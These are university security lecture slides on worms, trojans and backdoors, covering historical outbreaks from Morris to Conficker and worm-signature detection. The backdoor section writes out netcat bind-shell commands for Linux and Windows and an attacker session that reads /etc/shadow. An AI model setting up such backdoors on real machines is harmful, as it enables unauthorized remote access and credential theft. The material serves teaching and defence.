1 cscd 434 spring 2012 lecture 8 attacks worms, trojans, backdoors


CSCD 434, Spring 2012
Lecture 8: Attacks
Worms, Trojans, Backdoors

Introduction
• Today, cover malware
– Worms, Trojan Horses / Backdoors
– Define Rootkits, viruses - cover later
– Nearly all of these infect computers via the network
• Email counts as a form of remote infection
– If you do decide to write one for fun don't release it ... could wind up in jail

Definitions
• Worm
– Replicates itself, stand-alone program, spreads via network
• Virus
– Program that attaches itself to another program
– Replicates itself, program must be run
• Trojan horse
– Program that pretends to do one thing but does something behind the scenes
• Rootkit
– A component that uses stealth to maintain a persistent and undetectable presence on the machine

Almost 30 years of Malware


Purpose of Malware
• What is the main purpose of most malware?
• Profit!!!!
• Modern malware is a for-profit, big-business undertaking
• Online criminals invest significant amounts of money and time in more efficient malware and better malware distribution mechanisms because the financial rewards can be enormous

Purpose of Malware
• How is it distributed these days?
• Malware has been part of computing for decades
• In the 1990s, floppy disks: it got onto your computer or network when you stuck an infected floppy disk into your drive
• Then, as email became more prevalent, hackers designed malware to spread as infected email attachments
• Today, the Internet is a fantastic distribution mechanism for malware

Worms

Worms
• A worm is self-replicating software designed to spread through the network
– Typically exploits security flaws in widely used services ... mostly buffer overflows
– Causes massive damage: launches DDoS attacks, installs bot networks, accesses sensitive information, used for spam

Worms
• Worm vs Virus vs Trojan horse
– A virus is code embedded in a file or program
– Viruses and Trojan horses rely on humans
• Human must access file or run program
– Worms are often self-contained and may spread autonomously ... and they do!
• Can also spread via email, Internet

How Do Worms Spread?
• Copy itself directly across the network
• Read your address book
– Emails itself to everyone in your address book
– How easy is it to do this?
– Microsoft Outlook – was trivial, < 5 lines of code to send out an email
– Can cause Outlook to send emails without user awareness
– Reason why so many worms targeted Outlook

Historical Worm Examples

Morris Worm
• First appeared in 1988
• Purpose
– Determine where it could spread
– Spread its infection
– Remain undiscovered
• Morris claimed his worm had a bug...
• Morris worm tried to re-infect systems
– Led to resource exhaustion

Morris Worm
• How did it spread?
• Tried to obtain access to machine by...
– User account password guessing
– Exploited buffer overflow in fingerd
– Exploited debug code in sendmail
• Flaws in fingerd and sendmail were well-known at the time, but not widely patched

Morris Worm
• Once access had been obtained to machine...
• "Bootstrap loader" sent to victim
– Consisted of 99 lines of C code
• Victim machine compiled and executed code
• Bootstrap loader fetched the rest of worm

Morris Worm
• Why was it successful?
– If transmission of worm was interrupted, all code was deleted
– Code encrypted when downloaded
– Code deleted after decrypting and compiling
– When running, worm regularly changed its name and process identifier (PID)

I-Love-You Worm
• E-mail worm arrived May 4, 2000, with subject "ILOVEYOU" and an attachment
– LOVE-LETTER-FOR-YOU.TXT.vbs

I-Love-You Worm
• LOVE-LETTER-FOR-YOU.TXT.vbs
– Upon opening attachment, software sent copy of itself to everyone in user's address list, posing as user
• Overwrote all these file types:
• VBS, VBE, JS, JSE, CSS, WSH, SCT, HTA, JPG, JPEG, MP3, and MP2
• Overwritten files contain worm's body and extensions changed to vbs

I-Love-You Worm
• How did it spread?
• Sent a copy of itself to first 50 addresses in Windows Address Book used by Microsoft Outlook
• Why was it successful?
• Took advantage of a Microsoft algorithm for hiding file extensions; Windows had begun hiding extensions by default
• Enticed users to open the attachment, ensuring continued propagation
• Exploited systemic weaknesses in design of Microsoft Outlook and Microsoft Windows which let unused features easily run malicious code capable of achieving complete access to the operating system

Code Red I
• July 13, 2001: First worm of modern era
• Exploited buffer overflow in Microsoft's Internet Information Server (IIS)
• How did it spread?
• 1st through 20th of each month: Spread
– Find new targets by random scan of IP address space
– Spawn 99 threads to generate addresses and look for IIS
– Creator forgot to seed random number generator, and every copy scanned same set of addresses ... Oops
• 21st through the end of each month: Attack
– Defaced websites with "HELLO! Welcome to http://www.worm.com! Hacked by Chinese!"

Code Red I v2
• July 19, 2001: Same codebase as Code Red I, but fixed the bug in random IP address generation
– Compromised all vulnerable IIS servers on Internet
– Fast spread
• Scanned address space grew exponentially
• 350,000 hosts infected in 14 hours!!
• Payload: distributed packet flooding (denial of service) attack on www.whitehouse.gov

Code Red II
• August 4, 2001: Same IIS vulnerability, completely different code, kills Code Red I
– Known as "Code Red II" because of comment in code
– Worked only on Windows 2000, crashed NT
• Scanning algorithm preferred nearby addresses
– Chose addresses from same class A with probability 1/2, same class B with probability 3/8, and randomly from the entire Internet with probability 1/8
• Payload: installed root backdoor in IIS servers for unrestricted remote access
• Died by design on October 1, 2001

[Figure: Code Red / Nimda infection timeline. Annotations: Code Red 2 kills off Code Red 1; Code Red 2 settles into weekly pattern; Nimda enters the ecosystem; Code Red 2 dies off as programmed; CR 1 returns thanks to bad clocks]

Slides: Vern Paxson

SQL Slammer
• Another modern worm, SQL Slammer, January 2003
– Although titled "SQL slammer worm", program didn't use SQL language
• How did it work?
• It exploited a buffer overflow bug in Microsoft's SQL Server and Desktop Engine database products, for which a patch had been released six months earlier
• Affected Microsoft SQL 2000
– Vulnerable population, 75,000 machines infected in less than 10 minutes
http://en.wikipedia.org/wiki/SQL_slammer_worm

[Figure: Slammer infection map at 05:29:00 UTC, January 25, 2003; from Moore et al. "The Spread of the Sapphire/Slammer Worm"]

[Figure: 30 Minutes Later. Size of circles is logarithmic in the number of infected machines; from Moore et al. "The Spread of the Sapphire/Slammer Worm"]

Secret of Slammer's Speed
• Why was it successful?
• Old-style worms (Code Red) spawn a new thread which tries to establish a TCP connection
– If successful, send a copy of itself over TCP
– Limited by latency of the network
• Slammer improved the concept: connectionless UDP worm
– No connection establishment, simply sent a 404-byte UDP packet to randomly generated IP addresses
– Limited only by bandwidth of the network

Modern Day Worms

Modern Worms Don't Just Spread
• Old-Style Worms
– Mostly to spread, very noticeable in attacks
– How fast and far can we go?
– Sometimes dropped other malware to maintain access
• Modern Worms – Stealthier
– Always have payload of more malware
– Many infection vectors - not just one
– Use resources of machine, glean user information

Modern Worms Don't Just Spread
• These worms spread more subtly
– Without making noise
– Symptoms don't appear immediately, infected computer can sit dormant for a long time
– If it were a disease,
• More like syphilis, whose symptoms may be mild or disappear altogether,
• Eventually come back years later and eat your brain !!
– Bruce Schneier http://www.schneier.com/blog/archives/2007/10/the_storm_worm.html

Storm Worm 2007
• How did it spread?
• Spread by cleverly designed spam campaign
– Arrived as an email with catchy subject
• First instance: "230 dead as storm batters Europe"
• Other examples: "Condoleeza Rice has kicked German Chancellor", "Radical Muslim drinking enemies's blood", "Saddam Hussein alive!", "Fidel Castro dead", etc.
• Attachment or URL with malicious payload
– FullVideo.exe, MoreHere.exe, ReadMore.exe, etc.
– Also masqueraded as flash postcards
• Once opened,
• Installs trojan (wincom32) and rootkit !!!

Storm Worm Characteristics
• Infected host joined botnet
• Obfuscated P2P control structure
– Interacted with peers via eDonkey protocol
• Obfuscated code, anti-debugging defenses
– Goes into infinite loop if it detects VMware or Virtual PC
– Large number of spurious probes, evidence of external analysis, triggers distributed DoS attack
• Infection Estimates
• Between 1 million and 50 million computers infected worldwide

Storm Worm Characteristics
• Storm's Payload
• Morphs every 30 minutes or so
– Typical AV (antivirus) and IDS techniques less effective --- they use code signatures to detect
• Storm e-mail also changes all the time, leveraging social engineering techniques
– There are always new subject lines and new enticing text
• Storm began attacking anti-spam sites focused on identifying it -- spamhaus.org, 419eater and so on -- and the personal website of Joe Stewart, who published an analysis of Storm

Conficker Worm
http://www.confickerworkinggroup.org/wiki/pmwiki.php/ANY/InfectionDistribution
• Conficker.A was first detected on 21 November 2008 and exploited MS08-067; below is infection as of 4/1/2009
• MS08-067 Server Service Buffer Overflow
– This service facilitates file, print, and named-pipe sharing over the network for Windows-based computers
– Successful exploitation may result in execution of arbitrary code on the target host with System privileges!!!!

Conficker Worm
• Conficker.B, detected in February 2009, added ability to spread through network shares and removable storage devices
– USB drives and AutoRun function in Windows
• Conficker.C shuts down security services, blocks computers from connecting to security Web sites, and downloads a Trojan
• Also reaches out to other infected computers via peer-to-peer networking
– Includes a list of 50,000 different domains, 500 of which will be contacted by the infected computer on April 1 to receive updated copies or other malware or instructions

Conficker Worm
• Where did Conficker come from?
– Ties to Russian Business Network, not sure
• Currently still a problem
http://www.confickerworkinggroup.org/wiki/pmwiki.php/ANY/InfectionTracking

Worm Propagation Methods
• Scanning worms - Worm chooses "random" address
• Coordinated scanning - Different worm instances scan different addresses
• Meta-server worm - Ask server for hosts to infect
• Topological worm - Uses information from infected hosts
– Web server logs, email address books, config files, SSH "known hosts"
• Contagion worm - Propagate parasitically along with normally initiated communication

Worm Signature
• Monitor network and look for strings common to traffic with worm-like behavior
• Signatures can then be used for content filtering

Slide: S Savage

Content Sifting
• Assume there exists some (relatively) unique invariant bitstring W across all instances of a particular worm
• Two Consequences
– Content Prevalence: W will be more common in traffic than other bitstrings of the same length
– Address Dispersion: the set of packets containing W will address a disproportionate number of distinct sources and destinations
• Content sifting: find W's with high content prevalence and high address dispersion and drop that traffic
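Added illustration, not part of the original slides: the two content-sifting criteria above run over constructed sample traffic. A popular web page is highly prevalent but comes from a single source, so only the worm's invariant W passes both the prevalence and the dispersion tests; all names, addresses and payloads below are made up.

```python
from collections import defaultdict

K = 8  # length of the byte substrings examined (a fixed window, as in content sifting)


def sift(packets, k=K, min_count=4, min_sources=3, min_dests=3):
    """Return the k-byte substrings that are both prevalent (seen in at least
    min_count packets) and dispersed (those packets span at least min_sources
    distinct sources and min_dests distinct destinations).  Passing
    min_sources=min_dests=1 degrades this to a prevalence-only check."""
    count, sources, dests = defaultdict(int), defaultdict(set), defaultdict(set)
    for src, dst, payload in packets:
        seen = set()
        for i in range(len(payload) - k + 1):
            sub = payload[i:i + k]
            if sub in seen:  # count a substring once per packet
                continue
            seen.add(sub)
            count[sub] += 1
            sources[sub].add(src)
            dests[sub].add(dst)
    return sorted(
        s for s, n in count.items()
        if n >= min_count and len(sources[s]) >= min_sources and len(dests[s]) >= min_dests
    )


# Constructed sample traffic, not real captures: (source, destination, payload).
W = b"W0RM-SIG"  # the invariant bitstring every copy of the toy worm carries
WORM_PACKETS = [  # distinct infected hosts, each probing a different victim
    ("10.0.0.1", "10.0.9.1", b"AAAA" + W + b"aaaa"),
    ("10.0.0.2", "10.0.9.2", b"BBBB" + W + b"bbbb"),
    ("10.0.0.3", "10.0.9.3", b"CCCC" + W + b"cccc"),
    ("10.0.0.4", "10.0.9.4", b"DDDD" + W + b"dddd"),
]
# A popular page: highly prevalent, many destinations, but a single source.
PAGE = b"<html>Welcome to the campus portal</html>"
POPULAR_PAGE = [("192.0.2.80", "10.0.5.%d" % i, PAGE) for i in range(1, 7)]
NOISE = [
    ("10.0.7.1", "10.0.7.2", b"GET /index.html HTTP/1.0"),
    ("10.0.7.3", "10.0.7.4", b"220 mail.example ESMTP ready"),
]
TRAFFIC = WORM_PACKETS + POPULAR_PAGE + NOISE

if __name__ == "__main__":
    # Prevalence alone flags the popular page too; adding dispersion leaves only W.
    print(len(sift(TRAFFIC, min_sources=1, min_dests=1)), "prevalent substrings")
    print(sift(TRAFFIC))  # [b'W0RM-SIG']
```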

Malicious Code
• Using worms transformed into botnets
• Hundreds of thousands of vulnerable computers are being used to launch spam campaigns
• 70 percent of all spam is now sent this way, according to anti-spam firm Message Labs Inc.
• Perhaps 6 to 7 billion spam messages are routed through hacked home computers

Malicious Code
• Attack Trends
– Crossbreeding
• Combo malware raises threat, treats each element as a building block
• Malware developer of today constructs an attack tool by selecting various blocks and combining them in a single piece of code
– Worms used to spread backdoors
– Bugbear.b worm, which appeared in 2003, featured several backdoors
– Blaster worm and Sobig.F virus also installed backdoors

Malicious Code
• Attack Trends
• Combo malware ... far more likely to find some hole in your defenses than single-trick malware
• To fight combo malware, you need more than your signature-based AV engine loaded on servers and desktops
• You need to think in terms of holistic defense, addressing multiple vulnerability points, hardening your overall network and preparing for the worst

Ed Skoudis

Maintaining Access
• Once you have infected a computer,
• Gotten in through a vulnerability
• System or Human
• Maintain Access – needs a stealthy way back in ..
• Install a remote control backdoor on victim system
• Backdoor allows attacker access in the future

Backdoors
• What is a Backdoor?
– Once you penetrate a machine through one of the ways we talked about previously
– Want to install a future access point
– A backdoor is a way in to the system that allows an attacker admission whenever they want

Backdoors
• Example – Netcat tool
• Claim that netcat is one of the most popular backdoor tools in use today
• Netcat, when run on victim machine, can be configured to listen on any TCP port
– Executes any program for traffic coming in on that port
– Will have same permission as account from which netcat was executed
– Can send it data and have it executed on victim machine
• Assume attacker has gained access to a victim machine and wants to set up a command-shell backdoor

Backdoors – Linux Example

$ nc -l -p 12345 -e /bin/sh        (backdoor on victim_machine)

Runs the netcat program, which listens on TCP port 12345 and executes a shell with the data sent on port 12345

$ nc victim_machine 12345          (client on attacker machine)
cmd: ls                            (will list contents of directory from victim machine)
sensitive_documents tools games
cmd: cat /etc/shadow               (only works if user on victim has root)

Backdoors
• Example - Windows Machine
• Can also use netcat on Windows machine
• Instead of /bin/sh will use cmd.exe

C:\> nc -l -p 12345 -e cmd.exe     (on victim machine)

Similar results!

Backdoors and Trojans
• Trojans – Classic example:
• Replace /bin/login - lets users log in to system but saves passwords for later analysis
• Trojan Backdoor
• Combination of a backdoor hiding inside of a trojan program

Summary
– Malware – Viruses, Worms and combinations including Trojan backdoor components are rampant
– Continues to be a serious problem for everyone using the Internet
– Not just teenagers looking to brag anymore
• More and more the proliferation appears to be related to the business of spamming
• Resources: http://vx.netlux.org/ good for code examples

The End